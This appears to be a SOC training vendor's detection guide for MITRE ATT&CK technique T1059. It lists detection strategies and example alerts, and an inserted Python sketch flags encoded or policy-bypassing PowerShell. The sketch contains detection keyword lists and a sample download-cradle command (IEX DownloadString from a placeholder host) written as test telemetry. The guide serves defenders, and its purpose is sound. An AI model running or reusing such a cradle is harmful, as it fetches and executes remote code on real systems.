T1059 | Execution | Medium difficulty

Command and Scripting Interpreter

Command and Scripting Interpreter (T1059) is a MITRE ATT&CK technique in the Execution tactic. SOC analysts detect it by monitoring XDR and SIEM events for behavioral anomalies and the specific indicators described in this detection guide. Practice detection in SOCSimulator Operations.


What is Command and Scripting Interpreter?

Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell. There are also cross-platform interpreters such as Python. Attackers frequently leverage built-in interpreters because they are present on all systems, trusted by security tools, and often whitelisted by application control policies. PowerShell, WMI, cmd.exe, and bash are among the most commonly abused interpreters. The use of obfuscation, encoding, and living-off-the-land techniques makes detection challenging because malicious activity is conducted using legitimate system tools.

Command and Scripting Interpreter is documented as technique T1059 in the MITRE ATT&CK knowledge base under the Execution tactic. Detection requires visibility into XDR and SIEM telemetry.

Detection Strategies

The following detection strategies help SOC analysts identify Command and Scripting Interpreter activity. These methods apply across XDR and SIEM environments and can be implemented as detection rules, correlation queries, or behavioral analytics in your security platform.

1. Enable PowerShell script block logging and module logging to capture the full decoded content of executed scripts, including deobfuscated payloads that may not be visible in process command line arguments alone.

2. Monitor for command interpreter processes spawned by unusual parent processes such as Microsoft Office applications, web browsers, email clients, or PDF readers, which strongly suggests malicious document-based execution.

3. Detect encoded PowerShell commands by alerting on process creation events containing -EncodedCommand, -enc, or -e flags followed by Base64-encoded strings, a common technique for bypassing simple string-based detection.

4. Alert on the use of cmd.exe or PowerShell with flags designed to bypass execution policy or disable security features, such as -ExecutionPolicy Bypass, -NonInteractive, -WindowStyle Hidden, or -NoProfile.

5. Correlate scripting interpreter activity with network connections initiated shortly after execution to identify scripts performing download-cradle operations or establishing command-and-control communications.
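As an added illustration (not part of this guide or of the SOCSimulator platform), the following Python sketch applies strategies 2 to 4 to constructed process-creation events: it flags interpreters spawned by Office or browser parents, the bypass switches listed above, and abbreviated -EncodedCommand forms, then decodes the Base64/UTF-16LE payload so its content can be inspected the way script block logging would expose it. The parent and interpreter lists, the keyword hints and the sample events are assumptions chosen for the demonstration.

```python
import base64
import re

# Parents that should rarely spawn an interpreter: Office, browsers, mail, PDF readers (strategy 2).
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "chrome.exe", "msedge.exe", "acrord32.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
BYPASS_FLAGS = ("-executionpolicy bypass", "-noninteractive", "-windowstyle hidden", "-noprofile")
# powershell.exe accepts abbreviated forms of -EncodedCommand (-e, -ec, -enc, ...), so match the
# whole prefix family rather than one literal switch; -ex... (ExecutionPolicy) deliberately does not match.
ENC_FLAG = re.compile(r"(?:^|\s)[-/]e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})", re.I)
CRADLE_HINTS = ("downloadstring", "downloadfile", "invoke-expression", "iex ", "frombase64string")


def decode_encoded_command(b64: str):
    """-EncodedCommand payloads are Base64 of UTF-16LE text; return None for anything else."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(image: str, parent_image: str, command_line: str) -> list:
    """Return detection findings for one process-creation event (image, parent, command line)."""
    findings = []
    if image.lower() not in INTERPRETERS:
        return findings
    if parent_image.lower() in SUSPICIOUS_PARENTS:
        findings.append(f"interpreter spawned by {parent_image}")
    low = command_line.lower()
    findings += [f"bypass flag {f}" for f in BYPASS_FLAGS if f in low]
    m = ENC_FLAG.search(command_line)
    if m:
        decoded = decode_encoded_command(m.group(1))
        findings.append("encoded command" if decoded else "encoded command (undecodable)")
        if decoded and any(h in decoded.lower() for h in CRADLE_HINTS):
            findings.append("decoded payload contains download-cradle keywords")
    return findings


# Constructed sample telemetry, not from a real incident; the URL uses the reserved .invalid TLD.
SAMPLE_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage')"
SAMPLE_B64 = base64.b64encode(SAMPLE_PAYLOAD.encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    ("powershell.exe", "winword.exe", f"powershell.exe -NoProfile -WindowStyle Hidden -enc {SAMPLE_B64}"),
    ("cmd.exe", "chrome.exe", "cmd.exe /c whoami"),
    ("powershell.exe", "explorer.exe", "powershell.exe -Command Get-Process"),
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(f"{ev[1]} -> {ev[0]}: {analyze(*ev) or ['no findings']}")
```

The third sample event (an interactive PowerShell launched from explorer.exe) produces no findings, which is the baseline the other two should be tuned against.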

Example Alerts

These realistic alert examples show what Command and Scripting Interpreter looks like in your security tools. Use them to tune detection rules and train analysts to recognize true positives versus false positives in live environments.

Severity: High | Source: XDR

Encoded PowerShell Command Execution

PowerShell process launched with -EncodedCommand flag containing Base64-encoded payload that decodes to a download cradle fetching content from pastebin.com. Parent process is winword.exe, indicating macro-based execution. The downloaded script attempts to disable Windows Defender real-time protection before executing the second-stage payload.

Severity: High | Source: XDR

cmd.exe Spawned by Browser Process

Windows Command Shell was spawned as a child process of chrome.exe following navigation to a site serving a drive-by download. Command line arguments include net user and whoami reconnaissance commands, followed by a PowerShell download of a remote access tool from a domain registered 3 days ago.

Severity: Medium | Source: SIEM

Suspicious WMI Script Execution

WMI was used to execute a VBScript payload on 15 systems within the environment over a 10-minute window. The script connects to an external IP address and downloads a DLL file that is loaded into memory using regsvr32.exe. The lateral spread pattern and timing suggest automated execution by a worm or post-exploitation framework.

Practice Detecting Command and Scripting Interpreter

SOCSimulator provides hands-on training rooms where you investigate real-world attack scenarios including Command and Scripting Interpreter. Build detection skills with zero consequences — free forever.

12,000+ analysts trained
No credit card required

Frequently Asked Questions

How do SOC analysts detect Command and Scripting Interpreter?
SOC analysts detect Command and Scripting Interpreter (T1059) by monitoring XDR and SIEM telemetry for behavioral anomalies and specific indicators. Key detection methods include enabling PowerShell script block logging and module logging to capture the full decoded content of executed scripts, including deobfuscated payloads that may not be visible in process command line arguments alone. SOCSimulator provides hands-on practice detecting this technique with realistic alerts.
What security tools are used to detect Command and Scripting Interpreter?
Command and Scripting Interpreter can be detected using XDR and SIEM platforms. XDR tools are particularly effective for this technique because they provide visibility into the execution phase of the attack chain. SOCSimulator simulates all three tool types for hands-on training.
How common is Command and Scripting Interpreter in real-world attacks?
Command and Scripting Interpreter is a well-documented MITRE ATT&CK technique in the Execution tactic. It appears in threat intelligence reports from multiple security vendors and has been observed in campaigns by various threat actor groups. SOCSimulator includes realistic Command and Scripting Interpreter scenarios based on documented attack patterns, helping analysts build detection intuition.
Can I practice detecting Command and Scripting Interpreter for free?
Yes. SOCSimulator offers free forever access to training scenarios, including Execution techniques like Command and Scripting Interpreter. You can investigate realistic alerts in guided Operations rooms, build detection skills with SIEM, XDR, and Firewall interfaces, and test yourself under pressure in Shift Mode. No credit card required.